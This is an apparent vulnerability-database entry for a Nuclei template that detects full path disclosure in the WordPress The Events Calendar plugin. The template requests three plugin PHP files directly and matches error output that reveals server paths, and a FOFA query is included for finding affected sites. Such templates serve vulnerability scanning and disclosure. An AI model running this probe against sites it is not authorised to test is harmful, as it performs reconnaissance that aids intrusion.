wp-the-events-calendar-fpd: WordPress The Events Calendar - Full Path Disclosure

2026-01-08 WordPress The Events Calendar PoC Public

Description

WordPress The Events Calendar plugin is vulnerable to full path disclosure via direct access to plugin files.

PoC

id: wp-the-events-calendar-fpd

info:
  name: WordPress The Events Calendar - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress The Events Calendar plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/the-events-calendar/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: the-events-calendar
    framework: wordpress
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
  tags: wp,wordpress,wp-plugin,fpd,events-calendar,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/src/Tribe/Main.php"
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/src/Tribe/Admin/Admin.php"
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/common/src/Tribe/Main.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "the-events-calendar", "Uncaught Error:")'
        condition: and
# digest: 490a0046304402202e549c5c078dd9a42b92c6058f7429eebce274648ab6c5b6bc07f658e5cad4ab0220530569773916c4e95bdd641d68c4e121a2d79cc126ebe111c1916c6251cba2bb:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities